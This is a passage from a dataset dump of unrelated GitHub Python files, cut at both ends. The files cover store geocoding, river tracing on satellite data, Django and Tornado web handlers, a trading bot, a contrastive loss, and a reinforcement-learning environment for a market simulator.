{a[i]})\")\n","repo_name":"ZloiGaMeR/PythonCourseATIS","sub_path":"Practice/ismartynenko/razminka_enum.py","file_name":"razminka_enum.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32094857413","text":"import certifi\nimport ssl\nimport geopy.geocoders\nfrom geopy.geocoders import GoogleV3\nfrom geopy.exc import GeocoderTimedOut\nimport pandas as pd\nimport os\nfrom time import sleep\n\npd.set_option('display.max_columns',30)\n\nfrom config.secrets import APIKEY\n\nSRC_PATH = os.path.dirname(__file__)\nPROJECT_PATH = os.path.split(SRC_PATH)[0]\n\nfrom resources.json_components import out_start_str, out_end_str, store_str\n\n\ndef join_addrs(x):\n return '{} {} {}'.format(*x)\n\n\ndef convert_store_address():\n # Read stores data\n path = os.path.split(os.path.dirname(__file__))[0]\n store_list_fn = os.path.join(path, r'resources', r'new-store-list.xlsx')\n\n # TODO: FIX COLUMNS\n\n # columns = ['name', 'street', 'city', 'state']\n # store_list_df = pd.read_csv(store_list_fn, sep='\\t', header=0)\n assert os.path.isfile(store_list_fn)\n print('Reading ',store_list_fn)\n store_list_df = pd.read_excel(store_list_fn, engine='openpyxl')\n\n # store_list_df.fillna('', inplace=True)\n # store_list_df.dropna('', inplace=True)\n store_list_df = store_list_df.iloc[:, :4].dropna()\n store_list_df = store_list_df.sort_values(['name'])\n # store_list_df['address'] = store_list_df[['street', 'city', 'state']].apply(join_addrs, axis=1)\n print(store_list_df.columns.to_list())\n print(store_list_df.head())\n assert store_list_df.columns.to_list() == ['name', 'address', 'longitude', 'latitude']\n\n # create store list json\n ctx = ssl.create_default_context(cafile=certifi.where())\n geopy.geocoders.options.default_ssl_context = ctx\n geolocator = GoogleV3(api_key=APIKEY)\n n_stores = store_list_df.shape[0]\n print('Number of stores in file:', n_stores)\n store_addrs = []\n stores_without_location = 0\n i = 1\n for storeid in range(n_stores):\n prop = {\n 'category': 'grocery',\n 'description': '',\n 'name': '',\n 'address': '',\n 'phone': '',\n 'website': '',\n 'storeid': 0,\n 'lat': 0,\n 'long': 0\n }\n id = str(i).zfill(3)\n prop['storeid'] = id\n prop['name'] = store_list_df.iloc[storeid]['name']\n prop['address'] = store_list_df.iloc[storeid].address\n prop['lat'] = store_list_df.iloc[storeid].latitude\n prop['long'] = store_list_df.iloc[storeid].longitude\n if not prop['long']:\n try:\n location = geolocator.geocode(prop['address'])\n # location = geolocator.geocode(prop['address'], timeout=5)\n prop['lat'] = location.latitude\n prop['long'] = location.longitude\n sleep(0.5)\n except Exception as e:\n stores_without_location += 1\n print(e)\n print('No address for:', prop['name'])\n print(prop['address'])\n if prop['long']:\n store_addrs.append(store_str.format(**prop))\n i += 1\n\n json_file = out_start_str + ','.join(store_addrs) + out_end_str\n print('-' * 50)\n print(json_file)\n print('-' * 50)\n print('Did not find location for {} stores'.format(stores_without_location))\n out_fn = os.path.join(PROJECT_PATH, 'resources', 'results.json')\n with open(out_fn, 'w') as f:\n f.write(json_file)\n return json_file\n\n\ndef get_address_coordinates(address):\n \"\"\" Use google API to get the longitude and latitude of an address \"\"\"\n lat = 0\n long = 0\n return lat, long\n\n\nif __name__ == '__main__':\n convert_store_address()\n","repo_name":"Gabby-D/cc-store-locator","sub_path":"src/create_store_list_json.py","file_name":"create_store_list_json.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5994973636","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom rivertrace import trace\nfrom rivertrace.functions import plot_matrix, parse_netcdf, log, classify_river, plot_matrix_select, get_pixel_values\n\nturb = \"data/turbidity.nc\"\nswi = \"data/swi.nc\"\nrough_river = \"data/river.geojson\"\n\nswi_data, lat, lon = parse_netcdf(swi, \"rhos_swi\", \"lat\", \"lon\")\nplot_matrix(swi_data, title=\"SWI\")\n\nlog(\"Reading data from file {}\".format(turb))\nmatrix, lat, lon = parse_netcdf(turb, \"turb\", \"lat\", \"lon\")\n\nlog(\"Create boolean pixel map of water/ non-water pixels\")\nboolean = matrix.copy()\nboolean[boolean == 0] = np.nan\nboolean[~np.isnan(boolean)] = True\nboolean[np.isnan(boolean)] = False\nboolean = boolean.astype(bool)\nplot_matrix(boolean, title=\"Water classification plot\")\n\nlog(\"Update boolean pixel map to river pixels by applying max distance from rough river path\")\nboolean, start, end = classify_river(boolean, lat, lon, rough_river, buffer=0.001, direction=\"N\")\nplot_matrix(boolean, title=\"River classification plot\")\n\nlog(\"Manually remove any incorrectly classified water pixels\")\nboolean = plot_matrix_select(boolean)\n\npath = trace(boolean, start, end)\n\nlog(\"Plot results\")\noutput = swi_data.copy()\nfor p in path:\n output[p[0], p[1]] = 2\n\nplot_matrix(output, title=\"River classification plot\")\n\nlog(\"Plot profile of input values\")\nvalues = np.array(get_pixel_values(path, matrix, min=0, max=10000, group=1))\nplt.plot(values)\nplt.show()\n","repo_name":"JamesRunnalls/river-trace","sub_path":"tests/satellite.py","file_name":"satellite.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72835551929","text":"from django.shortcuts import render,redirect\nfrom django.contrib import messages \nimport random\nfrom .models import *\n\n# other models \nfrom property.models import PropertyModel\nfrom managers.models import ManagerModel\nfrom owners.models import OwnerModel\nfrom applications.models import ApplicationModel\n\n# Create your views here.\ndef PropertyDocuments(request):\n properties_files = PropertyDocument.objects.all().order_by('-date_created')\n\n # forms data \n properties = PropertyModel.objects.all()\n\n context = {\n \"properties_files\" : properties_files,\n \"properties\" : properties\n }\n\n return render(request,'Documents/property_documents.html',context)\n\n# Property Files Form \ndef PropertyFilesForm(request,id):\n property = PropertyModel.objects.get(id = id)\n\n # save Property File \n if request.method == 'POST' and 'submit_file' in request.POST:\n save_property_file = PropertyDocument()\n save_property_file.property = property\n save_property_file.name = request.POST.get('name')\n save_property_file.description = request.POST.get('file_description')\n save_property_file.file = request.FILES['file']\n save_property_file.save()\n messages.success(request,'New File Added') \n return redirect('property-documents')\n\n context = {\n \"property\" : property\n }\n return render(request,'forms/property_files_form.html',context)\n \n","repo_name":"ThulaneNcholo/AssetHQ01","sub_path":"server/Documents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42025196891","text":"# coding:utf8\n\n# 为了解决markdown编码错误问题\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nimport tornado.web\nfrom BackBaseHandler import BackBaseHandler\nfrom conf.conf import home_dir, back_dir\n\n\nclass BackIntroduceHandler(BackBaseHandler):\n '''\n 负责修改保存简介\n '''\n @tornado.web.authenticated\n def get(self):\n introduce_content = open(home_dir + \"md/introduce/introduce.md\", 'r').read()\n self.render(\"../page/back/introduce.html\", introduce=introduce_content, back_dir=back_dir, info_message=\"\")\n\n\n @tornado.web.authenticated\n def post(self):\n info_message = \"

保存成功

\"\n # 修改并保存简介\n introduce_content = self.get_argument(\"introduce\", None)\n open(home_dir + \"md/introduce/introduce.md\", 'w').write(introduce_content)\n\n introduce_content = open(home_dir + \"md/introduce/introduce.md\", 'r').read()\n self.render(\"../page/back/introduce.html\", introduce=introduce_content, back_dir=back_dir,\n info_message=info_message)\n\n","repo_name":"qux-bbb/simple_blog","sub_path":"blog/handler/BackIntroduceHandler.py","file_name":"BackIntroduceHandler.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42254468281","text":"import typing\nimport tbot\nfrom tbot.machine import channel, board, linux\nfrom tbot.tc import git\n\nif tbot.selectable.LabHost.name == \"pollux\":\n # Use pollux specific config\n import pollux as lab\nelse:\n raise NotImplementedError(\"Board not available on this labhost!\")\n\nub_env = [\n {\"name\" : \"netdev\", \"val\" : \"eth0\"},\n]\n\nclass socrates(lab.Board):\n name = \"socrates\"\n connect_wait = 2.0\n date = \"20200508\"\n\nclass socratesUBootBuilder(lab.UBootBuilder):\n name = \"socrates-builder\"\n defconfig = \"socrates_defconfig\"\n toolchain = \"powerpc\"\n remote = \"git@gitlab.denx.de:u-boot/u-boot.git\"\n\n testpy_boardenv = r\"\"\"# Config for socrates\n# Set sleep time and margin\nenv__sleep_time = 20\nenv__sleep_margin = 2\n\"\"\"\n\n def do_checkout(self, target: linux.Path, clean: bool, rev: typing.Optional[str]) -> git.GitRepository:\n branch = \"master\"\n return git.GitRepository(\n target=target, url=self.remote, clean=clean, rev=branch\n )\n\n def do_patch(self, repo: git.GitRepository) -> None:\n repo.am(linux.Path(repo.host, \"/home/hs/abb/mainlining/socrates/patches/20200508\"))\n\nclass socratesUBoot(lab.UBootMachine):\n name = \"soc-ub\"\n prompt = \"=> \"\n autoboot_prompt = None\n build = socratesUBootBuilder()\n\n def do_set_env(\n self, ub: board.UBootShell\n ) -> bool:\n ub.env(\"serverip\", tbot.selectable.LabHost.serverip[\"socrates\"])\n ub.env(\"netmask\", \"255.255.255.0\")\n ub.env(\"ipaddr\", tbot.selectable.LabHost.boardip[\"socrates\"])\n\n for env in ub_env:\n ub.env(env[\"name\"], env[\"val\"])\n\n\nBOARD = socrates\nUBOOT = socratesUBoot\nfrom tbot import log_event\nlog_event.doc_tag(\"board_name\", BOARD.name)\nlog_event.doc_tag(\"ub_prompt\", UBOOT.prompt)\n","repo_name":"EmbLux-Kft/tbot-tbot2go","sub_path":"boards/socrates.py","file_name":"socrates.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11071275322","text":"\"\"\"\nOpening Range Breakout Strategy\nNote:\nThis script is meant to be schedule through the OS.\n\"\"\"\n\nimport sqlite3\nfrom tradingapp import config\nimport smtplib\nimport ssl\nimport alpaca_trade_api as tradeapi\nimport datetime as dt\nfrom tradingapp.timezone import is_dst\n\n# Create a secure SSL context\ncontext = ssl.create_default_context()\n\nconnection = sqlite3.connect(config.DB_FILE)\nconnection.row_factory = sqlite3.Row\n\ncursor = connection.cursor()\n\ncursor.execute(\"\"\"\n SELECT id FROM strategy WHERE name = 'opening_range_breakout'\n\"\"\")\n\nstrategy_id = cursor.fetchone()['id']\n\ncursor.execute(\"\"\"\n SELECT symbol, name\n FROM stock\n JOIN stock_strategy ON stock_strategy.stock_id = stock.id\n WHERE stock_strategy.strategy_id = ?\n\"\"\", (strategy_id,))\n\nstocks = cursor.fetchall()\nsymbols = [stock['symbol'] for stock in stocks]\n\ncurrent_date = dt.date.today().isoformat()\n\nif is_dst():\n start_minute_bar = f\"{current_date} 09:30:00-05:00\"\n end_minute_bar = f\"{current_date} 09:45:00-05:00\"\nelse:\n start_minute_bar = f\"{current_date} 09:30:00-04:00\"\n end_minute_bar = f\"{current_date} 09:45:00-04:00\"\n\napi = tradeapi.REST(config.API_KEY, config.SECRET_KEY, base_url=config.API_URL)\n\norders = api.list_orders(status=\"all\", limit=500, after=current_date)\nexisting_order_symbols = [order.symbol for order in orders if order.status != 'canceled']\n\nmessages = []\n\nfor symbol in symbols:\n minute_bars = api.get_barset(symbol, '1Min', start=current_date, end=current_date).df\n\n opening_range_mask = (minute_bars.index >= start_minute_bar) & (minute_bars.index < end_minute_bar)\n opening_range_bars = minute_bars[symbol].loc[opening_range_mask]\n if not opening_range_bars.empty:\n opening_range_low = opening_range_bars['low'].min()\n opening_range_high = opening_range_bars['high'].max()\n opening_range = opening_range_high - opening_range_low\n\n after_opening_range_mask = minute_bars.index >= end_minute_bar\n after_opening_range_bars = minute_bars[symbol].loc[after_opening_range_mask]\n after_opening_range_breakout = after_opening_range_bars[after_opening_range_bars['close'] > opening_range_high]\n\n if not after_opening_range_breakout.empty:\n if symbol not in existing_order_symbols:\n limit_price = after_opening_range_breakout.iloc[0]['close']\n\n messages.append(\n f\"Placing order for {symbol} at {limit_price}, closed above {opening_range_high}\\n\\n{after_opening_range_breakout.iloc[0]}\\n\\n\")\n print(\n f\"Placing order for {symbol} at {limit_price}, closed above {opening_range_high} at {after_opening_range_breakout.iloc[0]}\")\n\n try:\n api.submit_order(\n symbol=symbol,\n side=\"buy\",\n type=\"limit\",\n qty='100',\n time_in_force=\"day\",\n order_class=\"bracket\",\n limit_price=limit_price,\n take_profit=dict(\n limit_price=limit_price + opening_range,\n ),\n stop_loss=dict(\n stop_price=limit_price - opening_range,\n )\n )\n except Exception as e:\n print(f\"Could not submit order {e}\")\n else:\n print(f\"Already an order for {symbol}, skipping\")\n\nwith smtplib.SMTP_SSL(config.EMAIL_HOST, config.EMAIL_PORT, context=context) as server:\n server.login(config.EMAIL_ADDRESS, config.EMAIL_PASSWORD)\n\n email_message = f\"Subject: Trade Notifications for {current_date}\\n\\n\"\n email_message += \"\\n\".join(messages)\n\n server.sendmail(config.EMAIL_ADDRESS, config.EMAIL_ADDRESS, email_message)\n","repo_name":"georgeerol/AlgoTrading","sub_path":"src/tradingapp/opening_range_breakout.py","file_name":"opening_range_breakout.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71755393210","text":"\nlimit = 10**7\n\nset1 = set()\nset2 = set()\nset3 = set()\nset7 = set()\n\na = 1\nwhile a*a < limit:\n a2 = a*a\n b = 1\n while a2+b*b < limit:\n set1.add(a2+b*b)\n b += 1\n b = 1\n while a2+2*b*b < limit:\n set2.add(a2+2*b*b)\n b += 1\n b = 1\n while a2+3*b*b < limit:\n set3.add(a2+3*b*b)\n b += 1\n b = 1\n while a2+7*b*b < limit:\n set7.add(a2+7*b*b)\n b += 1\n a += 1\nprint(':',len(set1),len(set2),len(set3),len(set7))\nprint(len(set1.intersection(set2).intersection(set3).intersection(set7)))\n","repo_name":"tkoz0/problems-project-euler","sub_path":"p229a_unsolved.py","file_name":"p229a_unsolved.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31302195111","text":"\nimport numpy as np\nfrom collections import Counter\nfrom random import randrange\n\n# Utilitaire pour CNN_test: récupère les données de db_test\n\nclass DataSet(object):\n def __init__(self, filename_data, nbdata, L2normalize=False, batchSize=128):\n self.nbdata = nbdata\n # taille des images 56*56 pixels en couleurs RBG\n self.dim = 9408\n self.imgSize = 56\n self.data = None\n self.batchSize = batchSize\n self.curPos = 0\n self.x = None\n\n f = open(filename_data, 'rb')\n self.data = np.empty([nbdata, self.dim], dtype=np.float32)\n for i in range(nbdata):\n self.data[i,:] = np.fromfile(f, dtype=np.uint8, count=self.dim)\n f.close()\n\n def GetTestBase(self):\n return self.data\n","repo_name":"Marc-Velay/MLA-proj","sub_path":"test_data_utils.py","file_name":"test_data_utils.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21002787605","text":"import datetime\nimport traceback\n\nfrom discord.ext import commands\n\nfrom safety import token\n\ninitial_cogs = [\"cogs.admin\", \"cogs.fun\", \"cogs.utilities\", \"cogs.roles\", \"cogs.tags\", \"cogs.stars\",\"cogs.points\"]\n\nbot = commands.Bot(command_prefix='r.')\n\n@bot.event\nasync def on_ready():\n print('Ready!')\n print(bot.user.name)\n print(bot.user.id)\n print('------------')\n bot.uptime = datetime.datetime.utcnow()\n\nfor cog in initial_cogs:\n try:\n bot.load_extension(cog)\n except Exception as exc:\n traceback_text = \"\\n\".join(traceback.format_exception(type(exc), exc, exc.__traceback__, 4))\n print(traceback_text)\n\nbot.run(token)","repo_name":"Jashanlol/Rewrite-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22355462284","text":"import cerberus\nimport requests\nimport random\n\nAUTH_DATA = {\n \"login\": \"admin\",\n \"password\": \"admin\"\n}\n\nschema = {\n \"name\": {\"type\": \"string\", \"required\": True},\n \"surname\": {\"type\": \"string\", \"required\": True},\n \"grade\": {\"type\": \"number\", \"required\": True},\n \"sex\": {\"type\": \"string\", \"required\": True}\n}\n\n\ndef test_update_add_authorized_session(base_url, set_mock):\n # Create session\n session = requests.Session()\n\n # Create user\n data_to_make = {\n \"name\": \"Test\" + str(random.randint(10, 1000)),\n \"surname\": \"TestSurname\",\n \"grade\": 10,\n \"sex\": \"male\"\n }\n\n set_mock(data_to_make)\n\n response = session.post(f\"{base_url}/update/add\", json=data_to_make)\n\n # Authorization\n login_response =session.request(\"login\", f\"{base_url}/auth/login\", json=AUTH_DATA)\n print(login_response)\n\n # Verify addition and response\n try:\n assert response.json().get(\"status\") == \"ok\"\n except AssertionError:\n raise AssertionError(response.json())\n\n data = response.json().get(\"data\")\n v = cerberus.Validator()\n\n assert response.json()[\"data\"][\"name\"] == data_to_make[\"name\"]\n assert v.validate(data, schema)\n","repo_name":"konflic/python_qa_mock","sub_path":"mtb_example/test_mtb_example.py","file_name":"test_mtb_example.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70535551928","text":"import numpy as np\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.nn import init\nfrom torch import nn, autograd\n\n\nclass InfoNCE(nn.Module):\n def __init__(self, num_samples, temp=0.05, momentum=0.2):\n super(InfoNCE, self).__init__()\n self.num_samples = num_samples\n\n self.momentum = momentum\n self.temp = temp\n\n self.register_buffer('labels', torch.arange(num_samples).long().cuda())\n # torch.zeros(num_samples).long())\n\n def forward(self, inputs, features, indexes):\n # inputs: B*2048, features: L*2048\n \n inputs = inputs.mm(features.t())\n\n inputs /= self.temp\n B = inputs.size(0)\n\n def masked_softmax(vec, mask, dim=1, epsilon=1e-6):\n exps = torch.exp(vec)\n masked_exps = exps * mask.float().clone()\n masked_sums = masked_exps.sum(dim, keepdim=True) + epsilon\n return (masked_exps/masked_sums)\n\n targets = self.labels[indexes].clone()\n labels = self.labels.clone()\n\n sim = torch.zeros(labels.max()+1, B).float().cuda()\n sim.index_add_(0, labels, inputs.t().contiguous())\n nums = torch.zeros(labels.max()+1, 1).float().cuda()\n nums.index_add_(0, labels, torch.ones(self.num_samples,1).float().cuda())\n mask = (nums>0).float()\n sim /= (mask*nums+(1-mask)).clone().expand_as(sim)\n mask = mask.expand_as(sim)\n masked_sim = masked_softmax(sim.t().contiguous(), mask.t().contiguous())\n return F.nll_loss(torch.log(masked_sim+1e-6), targets)","repo_name":"ZacharyWang-007/FED-Occluded-ReID","sub_path":"loss/infonce.py","file_name":"infonce.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"77"} +{"seq_id":"73018501048","text":"from .nouns_first import (\n fdma_nouns,\n fdmi_nouns,\n fdf_nouns,\n fdn_nouns\n)\n\nfrom .nouns_second import (\n sdma_nouns,\n sdmi_nouns,\n sdf_nouns,\n sdn_nouns\n)\n\n\nfrom .nouns_third import (\n tdma_nouns,\n tdf_nouns,\n tdn_nouns\n)\n\n\nfrom .verbs_first import fdv_verbs\n\n\nALL_NOUNS = (\n fdma_nouns + fdmi_nouns + fdf_nouns + fdn_nouns\n + sdma_nouns + sdmi_nouns + sdf_nouns + sdn_nouns\n + tdma_nouns + tdf_nouns + tdn_nouns\n )\n\n\nALL_VERBS = (fdv_verbs)\n","repo_name":"pete223/czech","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13716061806","text":"from abc import ABC, abstractmethod\nfrom gym import Env\nfrom gym import Space\nimport numpy as np\nfrom pams.agents import Agent\nfrom pams.agents import HighFrequencyAgent\nfrom pams.logs import Log\nfrom pams.logs import CancelLog\nfrom pams.logs import ExecutionLog\nfrom pams.logs import Log\nfrom pams.logs import Logger\nfrom pams.logs import MarketStepBeginLog\nfrom pams.logs import MarketStepEndLog\nfrom pams.logs import OrderLog\nfrom pams.logs import SessionBeginLog\nfrom pams.logs import SessionEndLog\nfrom pams.logs import SimulationBeginLog\nfrom pams.logs import SimulationEndLog\nfrom pams.market import Market\nfrom pams.order import Cancel\nfrom pams.order import Order\nfrom pams.runners import Runner\nfrom pams.session import Session\nfrom pams.simulator import Simulator\nimport random\nfrom random import Random\nimport torch\nfrom typing import Optional, TypeVar\n\nObsType = TypeVar(\"ObsType\")\nActionType = TypeVar(\"ActionType\")\nInfoType = TypeVar(\"InfoType\")\n\nclass PamsEnv(Env, ABC):\n \"\"\"PamsEnv class.\n\n Single agent RL environment for an agent in PAMS.\n This class inherits from the gym.Env class.\n \"\"\"\n def __init__(\n self,\n config_dic: dict,\n variable_ranges_dic: Optional[dict],\n simulator_class: type[Simulator],\n target_agent_name: str,\n action_dim: int,\n obs_dim: int,\n logger: Optional[Logger] = None,\n ) -> None:\n \"\"\"initialization.\n\n Args:\n config_dic (dict): runner configuration. (=settings)\n variable_ranges_dic (Optional[dict]): dict to specify the ranges of values for variables in config.\n Ex: {\"Market1\": {\"fundamentalDrift\": [-0.001,0.001], \"fundamentalVolatility\": [0,0.0001]},\n ...}\n The values of variables are sampled by .modify_config method as each episode.\n simulator_class (type[Simulator]): type of simulator.\n target_agent_name (str): target Agent name.\n action_dim (int): dimension of action space.\n obs_dim (int): dimension of observation space.\n logger (Optional[Logger]): logger instance. Defaults to None.\n \"\"\"\n self.config_dic: dict = config_dic\n self.variable_ranges_dic: Optional[dict] = variable_ranges_dic\n self.simulator_class: type[Simulator] = simulator_class\n self.target_agent_name: str = target_agent_name\n self.action_dim: int = action_dim\n self.obs_dim: int = obs_dim\n self.logger: Optional[Logger] = logger\n self._prng: Random = random.Random()\n self.action_space: Space = self.set_action_space()\n self.obs_space: Space = self.set_obs_space()\n\n @abstractmethod\n def set_action_space(self) -> Space:\n pass\n\n @abstractmethod\n def set_obs_space(self) -> Space:\n pass\n\n def seed(self, seed: int) -> None:\n \"\"\"set seed.\n\n Args:\n seed (int): seed value.\n \"\"\"\n self._prng.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.use_deterministic_algorithms = True\n\n def reset(self) -> ObsType:\n \"\"\"reset environment.\n\n initialize and set up runner and send initial observation to target agent.\n\n This method\n 1. modify config file according to randomlly generate variables by refering to variable_ranges_dic.\n 2. initialize and setup runner.\n 3. add optional attributes to the environment.\n 4. iterate markets untill target agent is called for submitting orders.\n\n - self.current_session_time is current number of time steps within the session.\n\n Returns:\n obs (ObsType): initial observation.\n \"\"\"\n initial_config_dic: dict = self.config_dic.copy()\n episode_config_dic: dict = self.modify_config(\n initial_config_dic, self.variable_ranges_dic\n )\n self.runner: Runner = self.setup_runner(episode_config_dic, self.logger)\n self.simulator: Simulator = self.runner.simulator\n self.target_agent: Agent = self.simulator.name2agent[self.target_agent_name]\n self.is_hft: bool = isinstance(self.target_agent, HighFrequencyAgent)\n self.sessions: list[Session] = self.simulator.sessions\n self.markets: list[Market] = self.simulator.markets\n self.current_session_idx: int = 0\n self.current_session_time: int = 0\n if self.logger is not None:\n log: Log = SimulationBeginLog(simulator=self.simulator)\n log.read_and_write_with_direct_process(logger=self.logger)\n self.add_attributes()\n self.unplaced_local_orders, _ = self.iterate_markets_til_target_agent_is_called()\n obs: ObsType = self.generate_obs()\n return obs\n\n def step(\n self,\n action: ActionType\n ) -> tuple[ObsType, float, bool, InfoType]:\n \"\"\"step environment.\n\n receive action by the agent and step the environment.\n\n Args:\n action (ActionType): action by target agent.\n\n Returns:\n next_obs (ObsType):\n reward (float):\n done (bool):\n info (InfoType):\n \"\"\"\n target_orders: list[Order | Cancel] = self.convert_action2orders(action)\n if self.is_hft:\n self.handle_orders_by_single_agent(target_orders)\n self.unplaced_local_orders, is_target_agent_called = \\\n self.handle_orders_wo_target_agents(\n session=self.current_session,\n unplaced_local_orders=self.unplaced_local_orders\n )\n if is_target_agent_called:\n next_obs: ObsType = self.generate_obs()\n reward: float = self.generate_reward()\n done: bool = False\n info: InfoType = self.generate_info()\n return next_obs, reward, done, info\n else:\n self.unplaced_local_orders.append(target_orders)\n self.runner._handle_orders(\n session=self.current_session, local_orders=self.unplaced_local_orders\n )\n for market in self.markets:\n if self.logger is not None:\n log = MarketStepEndLog(\n session=self.current_session, market=market, simulator=self.simulator\n )\n log.read_and_write_with_direct_process(logger=self.logger)\n self.simulator._trigger_event_after_step_for_market(market=market)\n self.unplaced_local_orders, done = self.iterate_markets_til_target_agent_is_called()\n next_obs: ObsType = self.generate_obs()\n reward: float = self.generate_reward()\n info: InfoType = self.generate_info()\n return next_obs, reward, done, info\n\n def iterate_markets_til_target_agent_is_called(\n self\n ) -> tuple[Optional[list[list[Order | Cancel]]], bool]:\n \"\"\"iterate markets until target agent is called for submitting orders.\n\n Returns:\n unplaced_local_orders (Optional[list[list[Order | Cancel]]]):\n local orders that have not yet placed at markets.\n done (bool): whether the simulation ended or not.\n \"\"\"\n done: bool = False\n while True:\n self.simulator._update_times_on_markets(self.markets)\n self.market_time: int = self.markets[0].get_time()\n self.simulator.current_session = self.sessions[self.current_session_idx]\n self.current_session: Session = self.simulator.current_session\n if self.current_session_time == 0:\n self.simulator._trigger_event_before_session(session=self.current_session)\n if self.logger is not None:\n log: Log = SessionBeginLog(\n session=self.current_session, simulator=self.simulator\n )\n log.read_and_write_with_direct_process(logger=self.logger)\n self.current_session_time += 1\n elif self.current_session_time == self.current_session.iteration_steps:\n self.simulator._trigger_event_after_session(session=self.current_session)\n if self.logger is not None:\n log = SessionEndLog(\n session=self.current_session, simulator=self.simulator\n )\n log.read_and_write_with_direct_process(logger=self.logger)\n if self.current_session_idx + 1 == len(self.sessions):\n done: bool = True\n if self.logger is not None:\n log = SimulationEndLog(simulator=self.simulator)\n log.read_and_write_with_direct_process(logger=self.logger)\n return None, done\n self.current_session_idx += 1\n self.current_session_time = 0\n else:\n self.current_session_time += 1\n for market in self.markets:\n market._is_running = self.current_session.with_order_execution\n self.simulator._trigger_event_before_step_for_market(market=market)\n if self.logger is not None:\n log = MarketStepBeginLog(\n session=self.current_session, market=market, simulator=self.simulator\n )\n log.read_and_write_with_direct_process(logger=self.logger)\n if self.current_session.with_order_placement:\n if self.is_hft:\n unplaced_local_orders: list[list[Order | Cancel]] = \\\n self.runner._collect_orders_from_normal_agents(\n session=self.current_session\n )\n unplaced_local_orders, is_target_agent_called = \\\n self.handle_orders_wo_target_agents(\n session=self.current_session,\n unplaced_local_orders=unplaced_local_orders\n )\n if is_target_agent_called:\n return unplaced_local_orders, done\n else:\n unplaced_local_orders, is_target_agent_called = \\\n self.collect_orders_from_normal_agents_wo_target_agent(\n session=self.current_session\n )\n if is_target_agent_called:\n return unplaced_local_orders, done\n self.runner._handle_orders(\n session=self.current_session, local_orders=unplaced_local_orders\n )\n for market in self.markets:\n if self.logger is not None:\n log = MarketStepEndLog(\n session=self.current_session, market=market, simulator=self.simulator\n )\n log.read_and_write_with_direct_process(logger=self.logger)\n self.simulator._trigger_event_after_step_for_market(market=market)\n\n def collect_orders_from_normal_agents_wo_target_agent(\n self,\n session: Session\n ) -> tuple[list[list[Order | Cancel]], bool]:\n \"\"\"_summary_\n\n Args:\n session (Session): _description_\n\n Returns:\n unplaced_local_orders (list[list[Order | Cancel]]): _description_\n is_target_agent_called (bool): _description_\n \"\"\"\n agents: list[Agent] = self.simulator.normal_frequency_agents\n agents = self._prng.sample(agents, len(agents))\n unplaced_local_orders: list[list[Order | Cancel]] = []\n n_orders: int = 0\n is_target_agent_called: bool = False\n for agent in agents:\n if session.max_normal_orders <= n_orders:\n break\n if agent.name == self.target_agent_name:\n n_orders += 1\n is_target_agent_called = True\n continue\n orders: list[Order | Cancel] = agent.submit_orders(markets=self.simulator.markets)\n if len(orders) > 0:\n unplaced_local_orders.append(orders)\n n_orders += 1\n return unplaced_local_orders, is_target_agent_called\n\n def handle_orders_wo_target_agents(\n self,\n session: Session,\n unplaced_local_orders: list[list[Order | Cancel]]\n ) -> tuple[list[list[Order | Cancel]], bool]:\n \"\"\"_summary_\n\n Args:\n session (Session): _description_\n unplaced_local_orders (list[list[Order | Cancel]]): _description_\n\n Returns:\n unplaced_local_orders (list[list[Order | Cancel]]): _description_\n is_target_agent_called (bool): _description_\n \"\"\"\n removing_orders: list[list[Order | Cancel]] = []\n is_target_agent_called: bool = False\n for orders in enumerate(unplaced_local_orders):\n self.handle_orders_by_single_agent(\n session, orders\n )\n removing_orders.append(orders)\n if session.high_frequency_submission_rate < self._prng.random():\n continue\n n_high_freq_orders: int = 0\n agents = self.simulator.high_frequency_agents\n agents = self._prng.sample(agents, len(agents))\n for agent in agents:\n if n_high_freq_orders >= session.max_high_frequency_orders:\n break\n if agent.name == self.target_agent_name:\n is_target_agent_called = True\n break\n high_freq_orders: list[Order | Cancel] = agent.submit_orders(markets=self.simulator.markets)\n n_high_freq_orders += 1\n self.handle_orders_by_single_agent(\n session, high_freq_orders\n )\n if is_target_agent_called:\n break\n for orders in removing_orders:\n unplaced_local_orders.remove(orders)\n return unplaced_local_orders, is_target_agent_called\n\n def handle_orders_by_single_agent(\n self,\n session: Session,\n orders: list[Order | Cancel]\n ) -> None:\n for order in orders:\n market: Market = self.simulator.id2market[order.market_id]\n if isinstance(order, Order):\n self.simulator._trigger_event_before_order(order=order)\n log: OrderLog 